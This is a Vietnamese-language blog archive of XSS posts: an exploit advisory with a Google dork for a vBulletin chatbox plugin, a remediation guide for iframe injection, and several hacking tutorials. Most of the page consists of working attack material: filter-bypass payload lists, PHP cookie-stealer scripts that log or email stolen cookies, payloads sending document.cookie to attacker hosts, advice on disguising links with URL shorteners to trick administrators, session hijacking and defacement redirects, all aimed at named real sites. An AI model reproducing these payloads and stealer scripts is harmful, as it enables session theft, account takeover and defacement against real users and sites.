Hiển thị các bài đăng có nhãn XSS. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn XSS. Hiển thị tất cả bài đăng

16 thg 8, 2013

ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive

ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive

# Exploit Title: ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive
# Google Dork: intitle:"Tin nhắn lưu trữ" and inurl:archive.php?page=
# Date: 24/06/2013
# Exploit Author: Juno_okyo



# Vendor Homepage: http://hoiquantinhoc.com/
# Software Link: http://hoiquantinhoc.com/modificatio...x-3-6-0-a.html
# Version: 3.6.0 (may affect other versions)
# Tested on: vBulletin 3.8.7 (and affect other versions)
# CVE : http://www.vbulletin.com/
################################################## ################
Vulnerability:
################################################## ################
An input unfiltered help we can exploit an XSS vulnerability:
if ($_GET['page'])
{
$page = $_GET['page'];
}
else
{
$page = 1;
}

################################################## ################
Exploitation:
################################################## ################
We can inject script for a XSS attack:
archive.php?page=<script>alert("XSS was found!")</script>
archive.php?page=<script>location.href="http://junookyo.blogspot.com/"</script>




################################################## ################
How to fix:
################################################## ################
Edit archive.php file, we need filter to prevent script injection:
if ($_GET['page'])
{
$page = htmlentities(strip_tags($_GET['page']));
}
else
{
$page = 1;
}

################################################## ################
More details:
################################################## ################
Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2013/06...atbox-xss.html

################################################## ################
Great thanks to J2TeaM (Juno_okyo, James, Neods, Killer, K-20 and all member)
################################################## ################

P/S: Demo: http://fusewireless.com/BYG/Chatbox/...9%3C/script%3E
Xem chi tiết »
no image

IFrame Injection Attacks

Kỹ thuật tấn công theo kiểu IFrame Injection hiện vẫn đang là 1 dạng xâm nhập cơ bản và phổ biến nhất của mô hình Cross-Site Scripting – XSS. Bằng cách chèn vào các website động 


(ASP, PHP, CGI, JSP … ) những thẻ HTML hay những đoạn mã script nguy hiểm, trong đó những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML cơ bản. Nếu bạn phát hiện được có kẻ đang nhắm vào website của bạn bằng kỹ thuật này, không nên quá lo lắng. Sau đây là 1 số thao tác cần làm khi website lâm vào tình trạng này.
Ví dụ 1 đoạn mã độc hại thường được sử dụng để tấn công:

{xtypo_code}
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
nội dung của đoạn mã độc
{/xtypo_code}


1. Thường xuyên bảo trì website trong 1 khoảng thời gian nhất định:

Các chuyên gia bảo mật khuyến cáo những người quản trị nên gỡ bỏ toàn bộ website xuống để tránh trường hợp trở thành tâm điểm phát tán mã độc. Và trong toàn bộ quá trình khắc phục, tiếp tục giữ tình trạng offline của website.

2. Thay đổi lại tất cả các mật khẩu:
Thoạt nghe có vẻ đơn giản, nhưng rất nhiều người quản trị hình như không mấy để ý đến khâu cực kỳ quan trọng này. Sau khi bị tin tặc nhòm ngó, bạn nên đổi mới tất cả mật khẩu bao gồm tài khoản ftp, ssh, các tài khoản quản trị, cơ sở dữ liệu …

3. Lưu lại 1 bản của website để phân tích:

Để xác định rõ nguyên nhân và điểm yếu nào đã bị tin tặc khai thác, bạn cần lưu giữ lại 1 bản nguyên tình trạng lúc bị tấn công. Điều này rất có ích cho việc phân tích và ngăn chặn hiểm họa sau này, bạn nên lưu lại website dưới dạng file nén định dạng rar, zip hoặc gzip và lưu trữ tại 1 nơi an toàn. Lưu ý rằng không bao giờ được lưu file cách ly này trực tiếp trên server.

4. Thay thế toàn bộ website bằng 1 bản sao lưu hoàn toàn sạch sẽ:

Không nên quá dựa vào những nhà cung cấp dịch vụ host rằng họ sẽ sao lưu toàn bộ dữ liệu cho bạn. Rất nhiều bộ phận hỗ trợ kỹ thuật thường xuyên khẳng định rằng họ có tiến hánh sao lưu tự động theo lịch trình, nhưng không gì có thể chắc chắn bằng việc bạn tự làm, hơn nữa 2 phương án dự phòng bao giờ cũng tốt hơn 1 phương án.

5. Kiểm tra lại website và đăng tải trở lại:

Quá trình này nên tiến hành chu đáo để đảm bảo rằng toàn bộ website an toàn và không còn lỗi nữa, sau đó bạn có thể đăng tải website trở lại như trước.

6. Tìm hiểu về nguồn gốc của các cuộc tấn công:

Để đảm bảo rằng những cuộc tấn công sẽ không bao giờ lặp lại, những người quản trị nên tiến hành 1 cuộc kiểm tra, phân tích đầy đủ và chi tiết của cuộc tấn công đó. Do lỗi ở đâu ? Lỗ hổng an ninh hay ứng dụng web ? Hoặc do chế độ phân quyền bị sai lệnh, nhầm lẫn ? Có thể website bị nhiêm virus trực tiếp ngay từ server lưu trữ dữ liệu ? Tất cả đều phải được tìm hiểu và phân tích kỹ lưỡng. Nếu cần thiết, hãy nhờ đến chuyên gia an ninh của các hãng bảo mật hàng đầu thế giới như Kaspersky, BitDefender, Norton, Panda, Avira …

7. Áp dụng các biện pháp bảo mật phù hợp:

Mặc dù bạn đã khôi phục thành công website, nhưng không có gì đảm bảo chắc chắn rằng website của bạn sẽ không bị tấn công thêm lần nào nữa. Nếu lỗ hổng an ninh cũ chưa được khắc phục, có thể website của bạn lại bị tê liệt ngay trong tối nay. Dựa vào các kết quả phân tích thu được ở bước trên, bạn nên áp dụng các biện pháp an ninh phù hợp, nâng cấp server, cài đặt thêm chương trình bảo mật, nâng cấp toàn bộ ứng dụng web hoặc tiến hành sử dụng quy luật bảo mật hoàn toàn mới.

Dựa vào kinh nghiệm quản lý và thông tin thu thập, chúng tôi có thể đóng góp thêm 1 số lời khuyên và dự đoán khách quan về nguyên nhân như sau. 

Các nguyên nhân dễ gặp phải:
- Website sử dụng dịch vụ host giá rẻ
- Dựa trên nền tảng phiên bản cũ của các ứng dụng mã nguồn mở, ví dụ như WordPress 1.0… vốn có khá nhiều lỗ hổng
- Quyền truy cập dữ liệu trên server được thiết lập không theo thứ tự nhất định, ví dụ quyền thao tác với dữ liệu ở mức 777 – đọc, ghi và thực thi
- Các thiếu sót của phần mềm ứng dụng
- Sử dụng FTP thay vì SFTP 
- Không hạn chế IP đối với các tài khoản SSH và FTP

Một số thao tác đơn giản nhưng hữu ích:
- Thay đổi mật khẩu định kỳ, ví dụ 2 tuần hoặc 4 tuần 1 lần
- Luôn cập nhật các phiên bản ổn định của ứng dụng
- Thường xuyên “dọn dẹp” các thư mục chứa dữ liệu trên server, để ý nếu có những file lạ đột nhiên xuất hiện
- Các mức phân quyền được thiết lập chuẩn xác
- Thường xuyên trao đổi với các đơn vị, chuyên gia cung cấp dịch vụ bảo mật để nhận được lời khuyên tốt nhất.

T.Anh (theo ComputerUser)
Xem chi tiết »

13 thg 3, 2013

 [Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS

[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS

Trong bài trước http://vhbsystem.net/@4rum/showthrea...ra-l%E1%BB%97i Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS



7. Kỹ Thuật Bypass

1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:



"><script>alert("Check By Soleil")</script>


"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 8 3, 111, 108, 101, 105, 108)) </script>


'><script>alert("Check By Soleil ")</script>


'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>

<ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>


<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>


"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>


"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>


'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>


'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>


</script><script>alert("Check By Soleil ")</script>


</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>


"/><script>alert("Check By Soleil ")</script>


"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>


'/><script>alert("Check By Soleil ")</script>


'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>


</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>


</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))


</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>


</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>

</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67,10 4,101,99,107,32,66,121,32,83,111,108,101,105,108,4 5,86,72,66,32,89,104,58,100,117,99,100,117,110,103 ,46,48,56,99,108,99 ))</SCRIPT>


";alert("Check By Soleil ");"


";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"


';alert("Check By Soleil ");'


';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'


";alert("Check By Soleil ")


";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
';alert("Check By Soleil ")


';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

Ví dụ:

- Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn đoạn mã script đã bypass sau:

<SCRIPT>alert(String.fromCharCode(67,104,101,99,10 7,32,66,121,32,83,111,108,101,105,108,45,86,72,66, 32,89,104,58,100,117,99,100,117,110,103,46,48,56,9 9,108,99 ))</SCRIPT>


Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.




- http://m.aol.com/yp/search?query=Bars"><script>alert(/Check By Mr.Soleil VHB_Group/)</script>

8. Quá trình các bước thực hiện tấn công bằng XSS

Bước 1: Tạo file Stealer.php để đánh cắp cookies

Nội dung của file Stealer.php như sau:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("logs.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

- $cookie = $HTTP_GET_VARS["cookie"]; // đánh cắp cookie từ địa chỉ hiện tại url(stealer.php?cookie=x) và lưu trữ cookie trong biến $cookie

- $steal = fopen("cookiefile.txt", "a"); // Mở cookiefile để đính kèm các cookie được đánh cắp

- fwrite($steal, $cookie ."\\n"); // Lưu lại những cookie được đánh cắp bên trong file

- fclose($steal); // Đóng lại cookiefile
File này có nhiệm vụ đánh cắp cookies của victim và ghi thông tin lên file logs.txt

Bước 2: Up các file lên host

UP lên host 2 file Stealer.php và logs.txt. Trong đó file Stealer.php có nội dung như trên và file logs.txt là file rỗng để lưu trữ toàn bộ thông tin của victim được gửi về thông qua mệnh lệnh được đưa ra từ file Stealer.php.

Lưu ý, phải chmod file log.txt về 777.

Ngoài ra có thể sử dụng các đoạn mã sau có thêm nhiều nhiệm vụ hơn cho file stealer.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: <ENTER WEBSITE HERE>");
?>

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"];

mail("ducdung.08clc@gmail.com", "Stolen Cookies", $cookie);

?>

// Đoạn mã này có tác dụng gửi cookies về email của attacker
Bước 3: Khai thác lỗ hổng XSS

- Giả sử soleil up 2 file trên lên host của site http://www.vhbgroup.net , thì đoạn mã script ăn cắp cookies có dạng như sau:

<script>location.href = 'http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
- Chèn đoạn mã đó vào site dính lỗi XSS là http://www.VulnerableSite.com ta được link tương tự như:

http://www.VulnerableSite.com/index.php?search=<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
Hoặc là chèn đoạn mã sau vào khung search, comment hay textbox nào đó, khi victim view site thì cookies sẽ được gửi về cho attacker

<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
Để đánh lừa được victim thì attacker sẽ làm ngắn đoạn url trên bằng cách sử dụng 1 số link sau:

http://tiny.cc/

http://www.shorturl.com/

http://tinyurl.com/

http://is.gd/

http://ow.ly/url/shorten-url

http://goo.gl/

http://mcaf.ee/

http://www.doiop.com/

https://addons.mozilla.org/vi/firefo...copy-shorturl/

Sau khi đã đánh cắp đươc thông tin cookies của victim, có thể sử dụng tiên ích add-ons cookies manager hoặc live http để login.
Xem chi tiết »

18 thg 11, 2012

[Tutorial] Tut check XSS locate.apple.com theo phương thức Post

[Tutorial] Tut check XSS locate.apple.com theo phương thức Post


Victim: locate.apple.com

Công cụ: Live HTTP để bắt các request
Bước 1: Vào trang chủ:locate.apple.com



Click chuột vào tab Services, Bật Live HTTP sau đó bắt request


Bước 2:Bật Live HTTP chương trình như sau



Bước 3:Các bạn nhìn thấy request Post trong hình rồi bây giờ click tab header->Để ý vào mục Post-> sau đo click vào Replay để request lại



Bước 4:Để ý trong nội dung Send Post content?. Mình sẽ thêm Script XSS ở đây mình thêm script sau
<script>alert('Check by kakavn_85')</script>  sau vị trí location=



Sai đó ấn nút replay đợi 1 lúc sẽ hiện ra kết quả như sau



End Tut: kakavn_85
Xem chi tiết »

5 thg 11, 2012

no image

Bypass XSS filters


Sau buổi tranning H'sM của bạn Mạnh Luật về XSS chúng ta đã thấy được sự nguy hiểm cũng như mức độ phổ biến của XSS -> có nhiều cách để ngăn chặn XSS -> kẻ tấn công cũng sẽ nghĩ ra nhiều kiểu tấn công mới để vượt qua các "bộ lọc".

Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.


Chúng ta sẽ cùng xem một số VD sau:

+Sử dụng các thuộc tính của các thẻ html:

<body onload=alert('test1')>

<b onmouseover=alert('Wufff!')>click me!</b>

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
Encode nội dung (UTF-8)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

+Sử dụng URI đã được encode base64

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại:
http://ha.ckers.org/xss.html

Thân ái,
Việt Nguyễn 
Xem chi tiết »

30 thg 8, 2012

XSS To Google Translate (30/8/2012)

XSS To Google Translate (30/8/2012)


Xem chi tiết »

26 thg 8, 2012

no image

XSS - Vietnamnet.vn (26/8/2012)


Xem chi tiết »

21 thg 8, 2012

[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc

[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc



 Bây giờ, Trong phần này tôi sẽ chia sẻ một vài cách để sử dụng sự nguy hiểm của XSS một lần nữa với trang web. Nào, hãy giữ sự tập trung tất cả những tấn công sẽ gửi đến hệ thống, trang web, máy chủ và hãy cẩn thận, bạn có thể bị truy tố về những hành động này. Vì vậy, hãy luôn bảo vệ bản thân nếu bạn đang lập kế hoạch làm một cái gì đó độc hại đến trang web. Nếu bạn muốn thực hiện một cửa sổ pop hộp cảnh báo nhỏ, bạn không phải sử dụng một Proxy / VPN.
Cookie Stealing/Logging

Bây giờ,lấy trộm cookielà về những điều độc hại nhất mà chúng ta có thể làm với XSS- Không Liên Tục. Một cookie kẻ đánh cắp / logger, sẽ đăng nhập các tập tin cookie của người dùng truy cập trang vào một tài liệu nhất định. Cách dễ nhất để làm điều này, sẽ là một quá trình ba bước.

Trước tiên, bạn nên thiết lập một trang web. Cá nhân tôi tìm thấy http://www.000webhost.com/ tốt nhất cho mã tải lên độc hại, các chương trình, hoặc bất cứ điều gì khác. Vì vậy, hãy đăng ký ở đó.
Bây giờ, một khi bạn đã tạo ra trang web của bạn, hãy vào quản lý tập tin. Tạo một file mới. Hãy gọi nó là "CookieLog.txt". Để trống mã. Bây giờ, tạo ra một tập tin sau đó, đặt tên là "CookieLogger.php". Trong CookieLogger.php, chúng ta cần thêm một số mã, do đó nó sẽ gửi các tập tin cookie mà chúng ta đăng nhập, vào Đăng nhập Cookie của chúng tôi. Thêm mã này, vào nó (Chỉ cần chắc chắn rằng tên tập tin là php, hoặc người nào khác nó sẽ không chạy mã PHP (ISS server ...ect))


<?php
/*
* Created on 16. april. 2007 Được tạo ngày 16/8/2007
* Created by Audun Larsen (audun@munio.no)- Tác giả-
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
// URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
// web site you include a credit somewhere on the web site
// with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";

var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for

return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>
Bây giờ chúng ta có kịch bản Logger Cookie của chúng ta, chúng ta có thể gửi các logger cookie cho người bạn tốt nhất của chúng ta, Web-Admin. Để làm điều này, chúng ta có lẽ nên Tiny URL. Hoặc nếu bạn có thể tìm ra cách để Spoof URL, mà sẽ làm việc quá.

Tiny URL, đi đến http://www.spam.com/ và chỉ cần đặt trong URL. Nhưng , chúng ta cần thêm một kịch bản vào lỗ hổng XSS của chúng ta. Đây là kịch bản mà sẽ khởi động Cookie Logging của chúng ta
 <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
Chắc bạn cũng hiểu là cần thay đổi gì trong đoạn script trên phải không. Hãy thay đường dẫn đến link CookieLogger bằng link của bạn
Vì vậy, chỉ cần thêm rằng kịch bản sau khi các URL,Sau đó gửi cho quản trị web của chúng ta bây giờ điều này có thể mất một thời gian cho ban quản trị để click vào nó. Bạn hãy tùy biến cách thức để nhà quản trị tin tưởng và click vào nó. Đôi khi, các quản trị sẽ ko click vào nó, vì vậy nếu nó mất quá nhiều thời gian, bạn chỉ nên từ bỏ và tìm một cách khác để khai thác nó.

Một khi bạn nhận được các cookie, bạn có thể sử dụng "Cookie Manager" của Firefox addon để thao tác và chỉnh sửa các tập tin cookie để bạn có thể chiếm quyền điều khiển phiên quản trị viên. Tôi thấy Cookie Manager là một ứng dụng rất hữu ích cho XSS, hãy tải nó về.
DEFACING

Defacing là một trong những điều phổ biến nhất mọi người muốn làm khi họ có quyền truy cập cho nhiều tùy chọn quản trị viên. Chủ yếu là để họ có thể quảng cáo cho bản thân, và chỉ đơn giản là cho phép người quản trị biết rằng an ninh của họ đã bị vi phạm. Bất cứ cách nào, defacing với XSS liên tục, có thể là một box bình luận, hoặc một cái gì đó. Bạn có thể sử dụng kịch bản để tạo lại trực tiếp đến trang của bạn thay đổi (Bạn có thể phải chuyển hướng thay đổi nội của bạn trên Pastehtml.com, bởi vì nó tải lên.một cách dễ dàng)
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
                      <script>location="http://web.com/hacked.html";</script>

                    <script>window.location="http://linkanh.com/anh.png";</script>

- Chèn ảnh vào nội dung website
                       <img src=" http://linkanh/anh.png"> 

- Chèn 1 video vào nội dung site
                      <EMBED SRC="http://link.com/hacked.swf">

XSS: onmouseover

Onmousover không phải là một lỗ hổng khai thác. Nhưng nó vẫn được coi là XSS. Một lỗ hổng onmouseover sẽ giống như thế này:
onmouseover=prompt1337
Chúng ta có thể khai thác nó bằng cách chỉnh sửa
onmouseover=alert("XSS")
Một lỗi rất cơ bản, nhưng nó nhận được cảnh báo, và các thành phần trong các trang web rất nhiều. Hầu hết các trang web sẽ sử dụng Adobe Flash hay CSS để làm những loại hiệu ứng.
XSS bypass bộ lọc
Đôi khi một truy vấn XSS đơn giản sẽ không làm việc. Lý do truy vấn của bạn không làm việc, là bởi vì trang web có một bộ WAF hoặc lọc tại chỗ. Một bộ lọc sẽ chặn như XSS và các truy vấn SQLi. Trong trường hợp này, chúng ta đang làm việc với XSS.

Có rất nhiều cách để bỏ qua các bộ lọc XSS, nhưng tôi sẽ chỉ giải thích một vài trường hợp.
1. Hex Bypassing
Với các char bị chặn như>, <, và /, nó là khá khó khăn để thực hiện một truy vấn XSS. Không phải lo lắng, luôn luôn là một giải pháp. Bạn có thể thay đổi các ký tự của bạn, vào Hex. Hex của một char nào đó, về cơ bản là các char, nhưng trong một định dạng khác nhau. Những điều này sẽ giúp bạn vượt qua:
> = %3c
< = %3c
/ = %2f
2.ASCII Bypassing
Với một mã hóa ASCII, chúng ta có thể sử dụng các char "bị chặn bộ lọc chặn tốt! Đây là một trong những bộ lọc XSS phổ biến nhất qua mọi thời đại Một kịch bản mà bạn sẽ cần để mã hóa, sẽ giống như thế này...:
Đây là đoạn mã không làm việc ---->
<script>alert("XSS")</script>
Còn đây ... Nó đã làm việc
<script>alert(String.fromCharCode(88,83,83))</script>
Để mã hóa bạn hãy truy cập wocares.com/noquote.php Tôi dùng trang này, và tìm thấy nhiều thứ khá hữu dụng
3.Case-Sensitive Bypassing
Loại bộ lọc này ít khi thấy, nhưng nó luôn luôn giá trị . Một số bộ lọc được thiết lập tại chỗ để phát hiện những đoạn viết, tuy nhiên, các bộ lọc của chuỗi bị chặn là trường hợp nhạy cảm. Vì vậy, tất cả chúng ta cần phải làm, là thực hiện một kịch bản, với các kiểu chữ hoa thường khác nhau . Điều này sẽ vượt qua bộ lọc, giống như dưới đây:
<ScRiPt>aLeRt("XSS")</ScRiPt>
Bạn cũng có thể kết hợp với mã hóa ASCII nếu bạn muốn. Hãy biến tấu nó thật linh hoạt.
Một vài Từ khóa cho lỗi XSS
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
Những dork này là cơ bản. Tôi ít khi dùng dork và với hướng dẫn này bạn koneen sử dụng dork. XSS là 1 lỗ hổng rất phổ biến ngay cả google, tôi đã tìm thấy một số.
Cuối cùng cảm ơn bạn đã đọc vui lòng phản hồi những ý kiến tại đây và nói cảm ơn nếu bạn thấy thích thú với hướng dẫn này của tôi.
Nguồn Tài Liệu
http://junookyo.blogspot.com/2011/12/bay-gio-trong-phan-nay-toi-se-chia-se.html
Xem chi tiết »
[Tutorial] XSS Bài 3: Thực hành với XSS - WARGAME

[Tutorial] XSS Bài 3: Thực hành với XSS - WARGAME


 Dear all!
Nói lý thuyết mãi cũng nhàm! Giờ là đến phần thực hành! Chúng ta phải hoàn toàn lưu ý là XSS là những cuộc tấn công trên máy client! Chứ hoàn toàn không có tác động gì đến server! Theo cách so sánh của mình thì đó có thể gọi là tấn công "du kích". Vì sao lại gọi như vậy, vì khi chúng ta thực hiện việc các công đoạn lấy cookie của các member trên website của server (site chứa lỗi XSS cũng chính là 1 thủ thuật SE) 
Đến h chúng ta hãy bắt đầu thực hành. Hãy nhớ bài 1 và bài 2 trong loạt bài viết về XSS này hẳn bạn cũng đã có 1 chút gì đó hiểu về XSS! Nếu không bạn vui lòng đọc lại bài 1,2 thì bài thứ 3 này bạn mới có thể thực hành được 
Một số lưu ý nhỏ khi thực hành:
- Hãy cố gắng thao tác trên các textbox, url!
- Cố gắng đưa ra kết quả là 1 hộp thoại chứa thông điệp...
- Vận dụng nhiều cách bypass như SQLi (Mình thấy nó khá giống nhau về khoản bypass này)
- Bạn có biết rằng google trả cho mỗi lỗi xss là 500usd, facebook và microsoft hay tw hay skype cũng trả khá nhiều cho mỗi lỗi xss không
Trả lời 1 số câu hỏi thường gặp:

- Có thể kiếm tiền từ cách attack này không?
TL: Hoàn toàn có thể được. Bạn có thể report đến nhà quản trị website và họ có thể tặng bạn vài trăm thậm trí vài ngàn usd! Nhưng đó là cách làm của 1 người thuộc trường phái lương thiện. Tạm gọi là white hat. Còn trường phái của blackhat là chẳng bao giờ báo cáo vì họ còn kiếm được nhiều tiền hơn từ những sự phát hiện của họ. Trong trường hợp này bạn có thể lấy được cookie của người sử dụng. Tuyệt vời hơn nếu nó là cookie của nhà quản trị website.(Đọc bài 2 để biết cách lấy cookie). Khi đã có cookie rồi thì có lẽ bạn đã làm chủ được cái tài khoản của 1 member trong website đó! Hãy thử tưởng tượng bạn có 1 cookie của 1 member trên amazone.... Bạn sẽ có gì???
- Có upload được shell không?
TL: Đừng bao giờ hỏi câu này lần thứ 2 nhé! Bởi cách attack này bạn chỉ thực hiện trên phía client không phải trên server! Bạn chỉ thao tác trên client chứ không thao tác trên server! Điều này có nghĩa là mọi tác động của bạn chỉ tác động đến máy client thôi! Còn chuyện upshell! OK! Cũng có khả năng lắm nếu bạn lấy được cookie của admin sau đó vào trang quản trj và upshell! Không có gì là không thể! 
- Mức độ nguy hiểm của loại attack này!
TL: Theo tôi nghĩ thì nó khá nguy hiểm! Không cớ gì mà khi phát hiện 1 lỗi XSS của trang web mà acunextive cảnh báo màu đỏ chót! Nó thực sự nguy hiểm đấy
Thôi có lẽ nói quá nhiều rồi! Giờ là ví dụ cho các bạn thực hành
Đây là victim
http://m.aol.com/yp/search?query=
Còn đây là kết quả!
http://m.aol.com/yp/search?query=Bars%22%3E%3Cscript%3Ealert%2/Can%20u%20see%20me%20^^!/%29%3C/script%3E
Bài thực hành 2:
http://www.irma-grenoble.com/05docum...ons.php?id_DT=
Đáp án: 
